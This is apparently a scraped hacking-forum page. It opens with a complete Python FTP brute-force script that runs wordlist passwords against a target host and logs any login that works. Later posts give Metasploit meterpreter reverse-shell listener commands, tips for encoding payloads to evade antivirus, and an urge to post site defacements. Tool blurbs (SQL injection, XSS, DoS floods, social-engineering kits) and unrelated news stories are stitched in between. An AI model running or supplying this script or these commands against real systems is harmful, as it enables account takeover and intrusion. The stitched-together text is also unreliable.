begood

#!/usr/bin/python # -*- coding: utf-8 -*- ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # This is ftp brute force tools [Updated]. # This was written for educational purpose and pentest only. Use it at your own risk. # Update : More efficient # : prevent loss added # : Anonymous checker added # VISIT : http://www.devilzc0de.com # CODING BY : gunslinger_ # EMAIL : gunslinger.devilzc0de@gmail.com # TOOL NAME : ftpbrute.py v1.5 # Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member # Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family # Greetz : all member of jasakom.com, jatimcrew.com # Special i made for jasakom member and devilzc0de family # Please remember... your action will be logged in target system... # Author will not be responsible for any damage !! # Use it with your own risk import sys import time import os from ftplib import FTP if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': SysCls = 'clear' elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': SysCls = 'cls' else: SysCls = 'unknown' log = "ftpbrute.log" face = ''' .___ .__ .__ _______ .___ __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ \/ \/ \/ \/ \/ \/ \/ \/ \/ http://www.devilzc0de.com by : gunslinger_ ftpbrute.py version 1.0 Brute forcing ftp target Programmmer : gunslinger_ gunslinger[at]devilzc0de[dot]com _____________________________________________________________________________________________________________________________________________ ''' option = ''' Usage: ./ftpbrute.py [options] Options: -t, --target <hostname/ip> | Target to bruteforcing -u, --user <user> | User for bruteforcing -w, --wordlist <filename> | Wordlist used for bruteforcing -h, --help <help> | print this help Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt ''' file = open(log, "a") def MyFace() : os.system(SysCls) print face file.write(face) def HelpMe() : MyFace() print option file.write(option) sys.exit(1) for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--user': user = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': HelpMe() elif len(sys.argv) <= 1: HelpMe() def checkanony() : try: print "\n[+] Checking for anonymous login\n" ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print "\n[!] Anonymous login successfuly !\n" ftp.quit() except Exception, e: print "\n[-] Anonymous login unsuccessful...\n" pass def BruteForce(word) : sys.stdout.write ("\r[?]Trying : %s " % (word)) sys.stdout.flush() file.write("\n[?]Trying :"+word) try: ftp = FTP(hostname) ftp.login(user, word) ftp.retrlines('list') ftp.quit() print "\n\t[!] Login Success ! " print "\t[!] Username : ",user, "" print "\t[!] Password : ",word, "" print "\t[!] Hostname : ",hostname, "" print "\t[!] Log all has been saved to",log,"\n" file.write("\n\n\t[!] Login Success ! ") file.write("\n\t[!] Username : "+user ) file.write("\n\t[!] Password : "+word ) file.write("\n\t[!] Hostname : "+hostname) file.write("\n\t[!] Log all has been saved to "+log) sys.exit(1) except Exception, e: #print "[-] Failed" pass except KeyboardInterrupt: print "\n[-] Aborting...\n" file.write("\n[-] Aborting...\n") sys.exit(1) MyFace() print "[!] Starting attack at %s" % time.strftime("%X") print "[!] System Activated for brute forcing..." print "[!] Please wait until brute forcing finish !\n" file.write("\n[!] Starting attack at %s" % time.strftime("%X")) file.write("\n[!] System Activated for brute forcing...") file.write("\n[!] Please wait until brute forcing finish !\n") checkanony() try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except(IOError): print "\n[-] Error: Check your wordlist path\n" file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) print "\n[+] Loaded:",len(words),"words" print "[+] Server :",hostname print "[+] User :",user print "[+] BruteForcing...\n" for word in words: BruteForce(word.replace("\n","")) file.close() http://packetstormsecurity.org/UNIX/scanners/ftpbrute.py.txt

Hong Kong, China (CNN) -- The computer attack which led Google to threaten leaving China and created a firestorm between Washington and Beijing appears to have been deployed by amateurs, according to an analysis by a U.S. technology firm. "I would say this particular botnet group was not well funded, in which case I would not conclude they were state sponsored, because the level of the tools used would have been far superior to what it was," said Gunter Ollmann, vice president of research at Damballa, an Atlanta-based company that provides computer network security. However, Ollmann points out that the attackers -- who emanated from China -- could have been contracted by outside parties to launch the attack. And while the deployment of the attack wasn't sophisticated, the Internet Explorer software vulnerability it exploited to infiltrate Google was. On January 12, Google charged that Chinese hackers targeted Google and more than 20 other Western companies in December and e-mail accounts of Chinese dissidents abroad had been compromised. As a result, Google threatened to pull its operations out of China, which has the most Internet users in the world. The incident launched a diplomatic spat between Beijing and Washington, including a January 21 speech by U.S. Secretary of State Hilary Clinton on Internet freedom in which she decried an "information curtain" descending on the world. McAfee Security Insights blog called the Google incident a "sophisticated, multi-vector attack." Critics allege that the attacks were sponsored or condoned by the Chinese government, something Beijing has strongly denied. "I would like to emphasize that accusations that say the government support hacking activities are groundless and are of ulterior motives," said Qin Gang, spokesperson for the Ministry of Foreign Affairs, at a February 23 press conference. This team launching the attack were unsophisticated amateurs --Gunter Ollmann, Damballa vice president of research RELATED TOPICS * China * Google Inc. * Censorship On the face of it, research by Damballa appears to support Beijing's claims. If the security hole in Internet Explorer was the smoking gun of the attacks, what Ollmann and his researchers looked at was "the occupants and driver of the getaway van," he said. They analyzed the global network of computers that attackers remotely used to deploy the attack, called a "botnet" -- computers that, unbeknownst to owners, are taken over remotely and used to spread malicious software, or malware. What Damballa researchers found in the Google attack botnet was less '007' and more 'DIY,' using software that could be found and downloaded widely on the Internet. "This team launching the attack were unsophisticated amateurs," Ollmann said. The botnet used in the attack began being tested in July, nearly six months before the attack, according to Damballa analysis. He added, "Some of the codes within the malware were at least five years old" -- ancient, by software development standards. The attackers used technology "that had been abandoned by professional botnet operators years ago," he said. The findings seem to support evidence that the attacks were promulgated by patriotic hackers in China rather than a government-sponsored conspiracy. But in the murky world of cybercrime, motives are often hard to pin down. The program that took advantage of the flaw found in the Internet Explorer software has been traced to two educational institutions in China, including one with alleged close ties to the military, the Financial Times reported. China dismisses these reports. "The two schools have issued clarification statements stating they are not involved in the Internet hackings," said Qin, the foreign affairs spokesperson, on February 23. "The reports on the hacking are completely not true and groundless." Cybercrime experts say that governments sometimes direct or encourage illegal botnet operators to launch attacks. When Russia and Georgia fought in August 2008, there is evidence that outside groups were contracted to help launch cyber attacks on Georgia's information systems, said Eugene Spafford, a computer security specialist at Purdue University who has advised two U.S. presidents and numerous companies and government agencies Added Ollmann, "The way that any small botnet operator profits is to extract valuable information that they sell, or the second route is to sell or rent the machines they have access to." But a spokesperson for the Committee of the Chinese People's Political Consultative Conference -- China's powerful political advisory body -- told reporters Tuesday that China does not tolerate hackers. "Chinese laws and regulations strictly prohibit hacker attacks of any kind, and have laid down legal punishment for those offenders," said Zhao Qizheng, according to state press. "I myself have been attacked by hackers, and I strongly detest hackers."

ati bagat directx10 ?

Sunt curios... cati ani ai ? "Am decis sa nu ma duc la clinica deoarece am sa-mi fac probleme." ai decis prost. pana la urma tot vei ajunge la ei... si tot se va afla daca ai ajuns asa departe.

Current Tool List * 1 OWASP WebScarab * 2 OWASP WebGoat * 3 OWASP CAL9000 * 4 OWASP JBroFuzz * 5 Paros Proxy * 6 nmap & Zenmap * 7 Wireshark * 8 tcpdump * 9 Firefox 3 * 10 Burp Suite * 11 Grenedel-Scan * 12 OWASP DirBuster * 13 OWASP SQLiX * 14 OWASP WSFuzzer * 15 Metasploit 3 * 16 w3af & GTK GUI for w3af * 17 Netcats collection * 18 OWASP Wapiti * 19 Nikto * 20 Fierce Domain Scaner * 21 Maltego CE * 22 Httprint * 23 SQLBrute * 24 Spike Proxy * 25 Rat Proxy Category:OWASP Live CD Project - OWASP Downloads OWASP

XSSploit is a tool for automated detection and exploitation of loopholes in Cross-Site Scripting in missions type penetration test. Developed in Python, XSSploit is naturally multi-platform and easy to use. XSSploit first browses the entire website and identifies the various forms that may have flaws like XSS. These forms are then automatically analyzed in order to identify existing XSS vulnerabilities and their characteristics. The faults detected and can then be exploited through the generation engine exploits XSSploit proposed. This allows you to choose the desired behavior and automatically generates the HTML links. XSSPloit can be used as part of application penetration testing. It also has a reporting feature with detailed links error and vunaribilty. Prerequisite: Python 2.5, wxPython GUI toolkit Download XSSPloit here

poate serverul ruleaza un antivirus, de ce nu generezi un custom payload cu metasploit. encoding = shikata_ga_nai ... sa zicem bind_tcp pentru a nu fi detectat de av. uite tutoriale folositoare lista de shellcodes : http://milw0rm.com/shellcode/ n-am testat inca, trebuie sa fac rost de un vpn intai. LE: INCA CEVA http://www.mavitunasecurity.com/blog/webraider/

Grabber is a web application scanner that basically detects some of application vulnerabilities in your web application. It has somethings that other scanners lack. It is simple to work with, not fast but portable and really adaptable! It is designed to scan small websites such as personal blogs, forums etc. The author also recommends against scanning larger applications as it would take too long time and flood the network. Though it is small, it has been tested at NIST! It currently supports the set of these vulnerabilities: - Cross-Site Scripting - SQL Injection (there is also a special Blind SQL Injection module) - File Inclusion - Backup files check - Simple AJAX check (parse every JavaScript and get the URL and try to get the parameters) - Hybrid analysis/Crystal ball testing for PHP application using PHP-SAT - JavaScript source code analyzer: Evaluation of the quality/correctness of the JavaScript with JavaScript Lint - Generation of a file [session_id, time(t)] for next stats analysis. Another thing about this project is its ease of use. You can prepare test cases with simple XML based scripts and you are ready to run tests! Grabber finds its base on research from some amazing sources such as OWASP, etc. It needs Python with BeautifulSoup and PyXML. Download Grabber v0.1 here. You also have an option of using it on a Windows machine as a executable by using py2exe.

WITOOL is a SQL injection tool powered by .NET (2.0), for SQL Server, Oracle, Error Base and Union Base. Features of WITOOL - -ORACLE Injection -Injection Auto script -Save XML from data -Inquery (View, Function object) -SQL SERVER Injection -Error base -Injection script customizing -Inquery (Db system info, Auth, Tables, Columns, Data) There are many effective sql injection tools. WITOOL focuses more on the connection between database and web application. So after basic database enumeration using web page as the frontend, we can focus on sql injection attacks. There is a video tutorial on WITOOL, which can be accessed here

payloadul default e pentru servere care ruleaza pe windows. ai verificat ?

PenTBox is a Security Suite that packs a lot of security and stability testing oriented tools for networks and systems. Programmed in Ruby, and oriented to GNU/Linux systems (but compatible with Windows, MacOS and more). It is free, licensed under GNU/GPLv3. - Cryptography tools Base64 Encoder & Decoder Multi-Digest (MD5, SHA1, SHA256, SHA512) Hash Password Cracker (MD5, SHA1, SHA256, SHA512) Secure Password Generator Files en/decryptor Rijndael (AES) 256 bits – GOST – ARC4 - Network tools TCP Flood DoSer TCP Flood AutoDoSer Nmap Spoofed SYN Flood DoSer [Require Nmap installed and Root Privileges] Port scanner Honeypot [Require Root Privileges] PenTBox Secure Instant Messaging Fuzzer - Extra L33t Sp3@k Converter Download

LookInMyPC generates a complete, and a comprehensive system profile that includes information on all installed hardware and software. Additionally it provides system diagnostic information such as details on running processes, installed services, startup programs, Windows updates and hot fixes, active network and Internet connections, TCP/IP port usage, event log detail, and much more. All this is provided in an easy to read, formatted report that you can view and print using your web browser. We have also hyperlinked many items so you can quickly and easily “Google” them to find out what they are or if some programs might be spyware or viruses. It is also completely non-invasive and makes no changes to your computers settings whatsoever. We have even included a handy function that allows you to create a full system profile and diagnostic report and automatically send it as an email ZIP file attachment to a tech support or help desk person for further analysis Some future features of LookInMyPC: - Command line operation. - Support for all browsers. - 100% portable installation options. - Functions to compare scans for changes between scans. - Full time TCP/IP and UDP port monitoring to help diagnose – - malware infections. - NT service version that runs on a pre-defined schedule. - Network scan repository support LookInMyPC is very quick and easy to use! There is no need for installation. You simply have to copy and run it. After it is done, just gather the reports! You don’t need to be an expert to do any of these! Operating systems supported: Windows 2000 Sp 4 and above ( 32-bit) Download LookInMyPC here

Darkjumper is a tool that will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server. darkjumper Functions of darkjumper: 1. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server. 2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site at the same server. 3. CGI and Path Scanning. 4. Port-scanning 5. Auto-bruteforcing after user enumeration 6. Auto-injector – auto column finder (mysql) if found mysql bug found 7. Proxy added 8. Verbocity added 9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not. - Additional feature: More fake HTTP user agent (can be used for stress test or DDOS attacks) It is written in Python. So, this tool can be used on any operating system that supports Python. Darkjumper can be used in six modes: - reverseonly: Only reverse target no checking bug - surface: Checking for sqli and blind sqli on every web that host at the same target server - full: Checking for sqli,blind,rfi,lfi on every web that host at the same target server - cgidirs: Scanning cgidirs on the target server - enum [number]: Guessing possible user enumeration on server (4-8 chars user enumeration) - portscan [startport]-[endport]: Scanning open port on server target To stop the scan run this command: killall -9 /usr/bin/python & killall -9 /usr/bin/perl Download Darkjumper version 5.5 here

upload payload via sqli custom listener examples CustomListenerSamples Bash #!/bin/sh msfcli3 exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=[YOURIP] LPORT=[PORT] E Windows Batch ruby.exe msfcli exploit/multi/handler LHOST=[YOURIP] LPORT=[PORT] PAYLOAD=windows/meterpreter/reverse_tcp E i.e. "D:\Program Files\Metasploit\Framework3\bin\ruby.exe" "D:\Documents and Settings\UserXP\Application Data\msf32\msfcli" exploit/multi/handler LHOST=12.12.12.72 LPORT=6666 PAYLOAD=windows/meterpreter/reverse_tcp E Whitepaper Weaponized SQLi //A new haxor generation will rise// Sa vad cat mai multe deface-uri postate la "club showoff" ! PS: payloadurile le poti face in metasploit, merge si pe linux si pe windows.

We have been waiting on Mr. Mavituna on releasing WebRaider, since the first day we heard him talk about it. Now, it is finally out and is open source! We were waiting for something like this because as of now, other tools that perform a similar function have different dependencies. This one has depends on the tool that we already rely on. So, what is so special about this tool. For starters, this tool has sponsorship from NetSparker, the tool that claims to be false positive free! Second, it uses a stripped down version of Metasploit! Third, it involves only one request for exploitation and is therefore faster! Infact, the idea of behind this tool is simple – get a reverse shell from an SQL Injection without using TFTP, FTP, etc. to upload the initial payload! Here are a few features of WebRaider: * It’s only one request therefore faster, * Simple, you don’t need a tool you can do it manually by using your browser or a simple MITM proxy, * just copy paste the payload, * CSRF(able), It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell * It’s not fixed, you can change the payload, * It’s short, Generally not more than 3.500 characters, * Doesn’t require any application on the target system like FTP, TFTP or debug.exe * Easy to automate. Normally during an SQL exploitation, we have to depend on tools such as debug.exe and the HTTP protocol limitation of 64kb’s etc. Now, all of this is easy with WebRaider. It does it all! WebRaider uses a VBScript to encode and decode the binary data, add some more functions that will make this work when executed on the target system, arrange this SQL injection on one line and that is all! We haven’t had much time to play around with this beauty. We will keep you updated as and when we play with this! Download WebRaider version 0.2.3.7 here.

Finding the best websites is very easy - click through any of the categories, or use the search box to find the web site you need. If you are an author of web site, you can add your web site for free by submitting to this page and following the on-screen instructions. Wireless Warrior - wifi link, news and information resource for wlan admins and advanced wardrivers :: wireless-warrior.org

Cheatsheet for NMAP 5 and Cheatsheet for HPING3 are cheatsheets for NMAP 5 & HPING3. The author has done an amazing job that we think needs an applause. They have these cheatsheets in two languages – English & Spanish. Keep these handy!! http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf PenTestIT Post Of The Day: Cheatsheets for NMAP 5 & HPING3! ? PenTestIT

inSSIDer is an award-winning free Wi-Fi network scanner for Windows Vista and Windows XP. Because NetStumbler doesn't work well with Vista and 64-bit XP, we built an open-source Wi-Fi network scanner designed for the current generation of Windows operating systems. inSSIDer was discussed by Lifehacker and Tekzilla! What's Unique about inSSIDer? * Use Windows Vista and Windows XP 64-bit. * Uses the Native Wi-Fi API. * Group by Mac Address, SSID, Channel, RSSI and "Time Last Seen." * Compatible with most GPS devices (NMEA v2.3 and higher). How can inSSIDer help me? * Inspect your WLAN and surrounding networks to troubleshoot competing access points. * Track the strength of received signal in dBm over time. * Filter access points in an easy to use format. * Highlight access points for areas with high Wi-Fi concentration. * Export Wi-Fi and GPS data to a KML file to view in Google Earth. inSSIDer Wi-Fi Scanner | MetaGeek

The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing Metasploit[1] payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering. SET was created by Rel1k for social-engineer.org. This video created by loganWHD demonstrates how to use the Social Engineers Toolkit to perform an email attack using a maliciously encoded PDF. The first step is actually dumpster diving and finding an internal email list of the company. Then he creates a malicious PDF file vulnerable to the util.printf security bug. Then loganWHD uses the SET to create a spoofed email about an important memo to check out the attached PDF for more details. Once the victim opens the attachment, the exploit gets executed and of couse ... GAME OVER! Nicely done! Thanks to loganWHD from Social-Engineer.org for submitting this video to ST! We would highly recommend visiting their site and to try out SET! Malicious Email Social Engineer Attack using Social Engineers Toolkit (SET) Tutorial

Informatii cu si despre Social Engineering PART I: GENERAL DISCUSSION I. Social Engineering Defined II. Categories of Social Engineers A. Hackers B. Penetration Testers C. Spies or Espionage D. Identity Thieves E. Disgruntled Employees F. Information Brokers G. Scam Artists H. Executive Recruiters I. Sales People J. Governments K. Everyday People III. Why Attackers Might Use Social Engineering IV. Typical Goals V. The Attack Cycle VI. Common Attacks A. Customer Service B. Tech Support C. Delivery Person D. Phone VII. Real World Examples A. Con Men B. Phishing C. Politicians D. Crime Victims PART II: INFORMATION GATHERING I. How to Gather Information A. Research B. Dumpster Diving II. Sources A. Traditional B. Non-Traditional III. Communication Models PART III: ELICITATION I. Definition II. Goals III. Preloading IV. Becoming a Successful Elicitor PART IV: PRETEXTING I. Definition II. Principles and Planning III. Successful Pretexting PART V: PSYCHOLOGICAL PRINCIPLES I. Modes of Thinking II. Eye Cues III. Micro-Expressions IV. Neuro-Linguistic Programming (NLP) A. Voice in NLP V. The Human Buffer Overflow VI. Interview and Interrogation VII. Instant Rapport PART VI: INFLUENCING OTHERS I. Influence Tactics A. Reciprocation 1. Obligation 2. Concession B. Scarcity C. Authority D. Commitment and Consistency E. Liking F. Consensus or Social Proof II. Framing III. Manipulation of Incentives PART VII: SOCIAL ENGINEERING TOOLS I. Physical A. Lock Picking and Shims B. Cameras C. GPS Tracker D. Pen Recorder II. Computer Based A. Maltego B. Maltego Mesh C. Social Engineer Toolkit (SET) D. Common User Passwords Profiler (CUPP) E. Who's Your Daddy Password Profiler (WYD) III. Phone A. Caller ID Spoofing Computer Based Social Engineering Tools: Social Engineer Toolkit (SET) The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing Metasploit[1] payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering. Podcast : http://www.social-engineer.org/framework/Podcast Episode 001 - Interrogation and Interview Tactics - Released - 05 Oct 2009 Episode 002 - Pretexting - Not Just For Social Engineers - Released - 09 Nov 2009 Episode 003 - Framing - Alter the Reality Frame - Released - 14 Dec 2009 Episode 004 - NLP, SE and Manipulation Secrets Revealed - Released - 11 Jan 2010 Episode 005 - Exclusive Interview with the BackTrack 4 Development Team - Released - 18 Jan 2010 Episode 006 - Using the Information Gathered as a Social Engineer - Released - 08 Feb 2010 download

Ncrack is an open source tool for network authentication cracking. It was designed for high-speed parallel cracking using a dynamic engine that can adapt to different network situations. Ncrack can also be extensively fine-tuned for special cases, though the default parameters are generic enough to cover almost every situation. It is built on a modular architecture that allows for easy extension to support additional protocols. Ncrack is designed for companies and security professionals to audit large networks for default or weak passwords in a rapid and reliable way. It can also be used to conduct fairly sophisticated and intensive brute force attacks against individual services. Ncrack Reference Guide (Man Page) download

Most of you must be aware of the MIT Open Course Ware initiative, where MIT has published their class lecture notes and videos on the Internet. This video series on "Introduction to computer Science and Programming" consists of around 24 lectures shot live in the class. This course is meant for people new to programming and uses Python as the learning language. A lot of people had requested me to make a Python primer series, I am happy I don't have to do that anymore This 24 lecture series is more than enough to learn Python programming. I have posted the first lecture below. You can find the rest on the OCW site or in the YouTube playlist for the video. In my humble opinion, Python is a great language for hackers - it's platform independent, flexible, object oriented and has tons of libraries and open source software written in it, which you can use. The best part is that the Python community is very supportive and is actively behind the language! This video is a recommended watch and Python a recommended language to learn! Enjoy! lecture: MIT OpenCourseWare | Electrical Engineering and Computer Science | 6.00 Introduction to Computer Science and Programming, Fall 2008 | Lecture Videos 24 de lectii. prima lectie : sau toate in format mp4 http://ia301530.us.archive.org/1/items/MIT6.00F08/

CNN is reporting that Evolutionary psychologist Satoshi Kanazawa at the the London School of Economics and Political Science correlated data on these behaviors with IQ from a large national U.S. sample and found that, on average, people who identified as liberal and atheist had higher IQs. This applied also to sexual exclusivity in men, but not in women. The findings will be published in the March 2010 issue of Social Psychology Quarterly. // in sfarsit au demonstrat si asta.

twoThousandAndLate writes "Breakthrough in the size , density and performance of FPGA's using time as a 3rd dimension. SAN FRANCISCO—Startup Tabula Inc. Monday (March 1) made public details about its three-dimensional programmable logic architecture, which the company says will enable a new class of devices, 3PLDs, that offer the capability of an ASIC, ease of use of an FPGA and price points suitable for volume production. According to Tabula executives, the company's Spacetime architecture rapidly reconfigures to executive portions of a design in a series of steps. Compared with a 40-nm FPGAs, Tabula's 40-nm devices will offer more than twice the logic density, twice the memory density, nearly three times as many memory ports and four times higher DSP performance, they claim. EETimes.com - 3-D architecture promises new type of PLD

Iowa State University Distinguished Professor of Psychology Craig Anderson has made much of his life's work studying how violent video game play affects youth behavior. And he says a new study he led, analyzing 130 research reports on more than 130,000 subjects worldwide, proves conclusively that exposure to violent video games makes more aggressive, less caring kids -- regardless of their age, sex or culture. The study was published today in the March 2010 issue of the Psychological Bulletin, an American Psychological Association journal. It reports that exposure to violent video games is a causal risk factor for increased aggressive thoughts and behavior, and decreased empathy and prosocial behavior in youths. RO Mai pe intelelesu lu' Ion : Daca obisnuiesti sa joci jocuri agresive ai tendinta sa devii mai agresiv, sa iti pese din ce in ce mai putin de restul lumii (inclusiv familie, prieteni, etc), devii mai retras de societatea "reala" si puterea de a empatiza scade, indiferent de culoarea pielii tale, a sexului sau a culturii din care faci parte. http://www.physorg.com/news186665767.html